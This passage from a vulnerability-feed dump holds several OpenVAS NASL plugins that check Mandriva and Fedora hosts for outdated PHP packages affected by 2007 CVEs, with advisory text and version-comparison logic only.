warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A heap-based buffer overflow vulnerability was found in PHP's gd\n extension. A script that could be forced to process WBMP images\n from an untrusted source could result in arbitrary code execution\n (CVE-2007-1001).\n\n A DoS flaw was found in how PHP processed a deeply nested array.\n A remote attacker could cause the PHP intrerpreter to creash\n by submitting an input variable with a deeply nested array\n (CVE-2007-1285).\n \n A vulnerability in the way the mbstring extension set global variables\n was discovered where a script using the mb_parse_str() function to\n set global variables could be forced to to enable the register_globals\n configuration option, possibly resulting in global variable injection\n (CVE-2007-1583).\n \n A vulnerability in how PHP's mail() function processed header data was\n discovered. If a script sent mail using a subject header containing\n a string from an untrusted source, a remote attacker could send bulk\n email to unintended recipients (CVE-2007-1718).\n \n A buffer overflow in the sqlite_decode_function() in the bundled\n sqlite library could allow context-dependent attackers to execute\n arbitrary code (CVE-2007-1887).\n \n Updated packages have been patched to correct these issues. Also note\n that the default use of the Hardened PHP patch helped to protect\n against some of these issues prior to patching.\";\n\ntag_affected = \"php on Mandriva Linux 2007.0,\n Mandriva Linux 2007.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-04/msg00025.php\");\n script_id(830059);\n script_version(\"$Revision: 6568 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:04:21 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 13:53:01 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_xref(name: \"MDKSA\", value: \"2007:089\");\n script_cve_id(\"CVE-2007-1001\", \"CVE-2007-1285\", \"CVE-2007-1583\", \"CVE-2007-1718\", \"CVE-2007-1887\");\n script_name( \"Mandriva Update for php MDKSA-2007:089 (php)\");\n\n script_summary(\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.1.6~1.2mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.1.6~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-sqlite\", rpm:\"php-sqlite~5.1.6~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.1.6~1.7mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2017-07-24T12:57:13", "bulletinFamily": "scanner", "description": "Check for the Version of php", "modified": "2017-07-06T00:00:00", "published": "2009-04-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=830064", "id": "OPENVAS:830064", "title": "Mandriva Update for php MDKSA-2007:090 (php)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for php MDKSA-2007:090 (php)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A heap-based buffer overflow vulnerability was found in PHP's gd\n extension. A script that could be forced to process WBMP images\n from an untrusted source could result in arbitrary code execution\n (CVE-2007-1001).\n\n A DoS flaw was found in how PHP processed a deeply nested array.\n A remote attacker could cause the PHP intrerpreter to creash\n by submitting an input variable with a deeply nested array\n (CVE-2007-1285).\n \n The internal filter module in PHP in certain instances did not properly\n strip HTML tags, which allowed a remote attacker conduct cross-site\n scripting (XSS) attacks (CVE-2007-1454).\n \n A vulnerability in the way the mbstring extension set global variables\n was discovered where a script using the mb_parse_str() function to\n set global variables could be forced to to enable the register_globals\n configuration option, possibly resulting in global variable injection\n (CVE-2007-1583).\n \n A vulnerability in how PHP's mail() function processed header data was\n discovered. If a script sent mail using a subject header containing\n a string from an untrusted source, a remote attacker could send bulk\n email to unintended recipients (CVE-2007-1718).\n \n Updated packages have been patched to correct these issues. Also note\n that the default use of Suhosin helped to protect against some of\n these issues prior to patching.\";\n\ntag_affected = \"php on Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-04/msg00026.php\");\n script_id(830064);\n script_version(\"$Revision: 6568 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:04:21 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 13:53:01 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_xref(name: \"MDKSA\", value: \"2007:090\");\n script_cve_id(\"CVE-2007-1001\", \"CVE-2007-1285\", \"CVE-2007-1454\", \"CVE-2007-1583\", \"CVE-2007-1718\");\n script_name( \"Mandriva Update for php MDKSA-2007:090 (php)\");\n\n script_summary(\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-filter\", rpm:\"php-filter~5.2.1~0.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.2.1~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.2.1~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-openssl\", rpm:\"php-openssl~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-zlib\", rpm:\"php-zlib~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2018-04-09T11:41:47", "bulletinFamily": "scanner", "description": "Check for the Version of php", "modified": "2018-04-06T00:00:00", "published": "2009-04-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830064", "id": "OPENVAS:1361412562310830064", "type": "openvas", "title": "Mandriva Update for php MDKSA-2007:090 (php)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for php MDKSA-2007:090 (php)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A heap-based buffer overflow vulnerability was found in PHP's gd\n extension. A script that could be forced to process WBMP images\n from an untrusted source could result in arbitrary code execution\n (CVE-2007-1001).\n\n A DoS flaw was found in how PHP processed a deeply nested array.\n A remote attacker could cause the PHP intrerpreter to creash\n by submitting an input variable with a deeply nested array\n (CVE-2007-1285).\n \n The internal filter module in PHP in certain instances did not properly\n strip HTML tags, which allowed a remote attacker conduct cross-site\n scripting (XSS) attacks (CVE-2007-1454).\n \n A vulnerability in the way the mbstring extension set global variables\n was discovered where a script using the mb_parse_str() function to\n set global variables could be forced to to enable the register_globals\n configuration option, possibly resulting in global variable injection\n (CVE-2007-1583).\n \n A vulnerability in how PHP's mail() function processed header data was\n discovered. If a script sent mail using a subject header containing\n a string from an untrusted source, a remote attacker could send bulk\n email to unintended recipients (CVE-2007-1718).\n \n Updated packages have been patched to correct these issues. Also note\n that the default use of Suhosin helped to protect against some of\n these issues prior to patching.\";\n\ntag_affected = \"php on Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-04/msg00026.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830064\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 13:53:01 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_xref(name: \"MDKSA\", value: \"2007:090\");\n script_cve_id(\"CVE-2007-1001\", \"CVE-2007-1285\", \"CVE-2007-1454\", \"CVE-2007-1583\", \"CVE-2007-1718\");\n script_name( \"Mandriva Update for php MDKSA-2007:090 (php)\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-filter\", rpm:\"php-filter~5.2.1~0.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.2.1~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.2.1~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-openssl\", rpm:\"php-openssl~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-zlib\", rpm:\"php-zlib~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.2.1~4.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2017-07-25T10:56:28", "bulletinFamily": "scanner", "description": "Check for the Version of php", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=861278", "id": "OPENVAS:861278", "title": "Fedora Update for php FEDORA-2007-455", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2007-455\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"php on Fedora Core 5\";\ntag_insight = \"PHP is an HTML-embedded scripting language. PHP attempts to make it\n easy for developers to write dynamically generated webpages. PHP also\n offers built-in database integration for several commercial and\n non-commercial database management systems, so writing a\n database-enabled webpage with PHP is fairly simple. The most common\n use of PHP coding is probably as a replacement for CGI scripts. The\n mod_php module enables the Apache Web server to understand and process\n the embedded PHP language in Web pages.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-April/msg00056.html\");\n script_id(861278);\n script_version(\"$Revision: 6622 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 07:52:50 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:27:46 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2007-455\");\n script_cve_id(\"CVE-2007-1285\", \"CVE-2007-1583\", \"CVE-2007-1718\", \"CVE-2007-1001\", \"CVE-2007-0455\", \"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\", \"CVE-2006-5465\", \"CVE-2006-4812\");\n script_name( \"Fedora Update for php FEDORA-2007-455\");\n\n script_summary(\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora_core\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC5\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-mysql\", rpm:\"x86_64/php-mysql~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-xml\", rpm:\"x86_64/php-xml~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-soap\", rpm:\"x86_64/php-soap~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-ncurses\", rpm:\"x86_64/php-ncurses~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php\", rpm:\"x86_64/php~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-pdo\", rpm:\"x86_64/php-pdo~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-pgsql\", rpm:\"x86_64/php-pgsql~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-ldap\", rpm:\"x86_64/php-ldap~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-mbstring\", rpm:\"x86_64/php-mbstring~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-dba\", rpm:\"x86_64/php-dba~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-odbc\", rpm:\"x86_64/php-odbc~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-bcmath\", rpm:\"x86_64/php-bcmath~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-xmlrpc\", rpm:\"x86_64/php-xmlrpc~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-devel\", rpm:\"x86_64/php-devel~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-snmp\", rpm:\"x86_64/php-snmp~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/debug/php-debuginfo\", rpm:\"x86_64/debug/php-debuginfo~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-imap\", rpm:\"x86_64/php-imap~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-gd\", rpm:\"x86_64/php-gd~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-mbstring\", rpm:\"i386/php-mbstring~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-xmlrpc\", rpm:\"i386/php-xmlrpc~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-dba\", rpm:\"i386/php-dba~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-devel\", rpm:\"i386/php-devel~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-mysql\", rpm:\"i386/php-mysql~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-snmp\", rpm:\"i386/php-snmp~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-xml\", rpm:\"i386/php-xml~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-pgsql\", rpm:\"i386/php-pgsql~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-bcmath\", rpm:\"i386/php-bcmath~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-imap\", rpm:\"i386/php-imap~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-pdo\", rpm:\"i386/php-pdo~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-odbc\", rpm:\"i386/php-odbc~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-gd\", rpm:\"i386/php-gd~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php\", rpm:\"i386/php~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/debug/php-debuginfo\", rpm:\"i386/debug/php-debuginfo~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-soap\", rpm:\"i386/php-soap~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-ncurses\", rpm:\"i386/php-ncurses~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-ldap\", rpm:\"i386/php-ldap~5.1.6~1.5\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:41", "bulletinFamily": "scanner", "description": "The remote host is missing an update to php4\nannounced via advisory 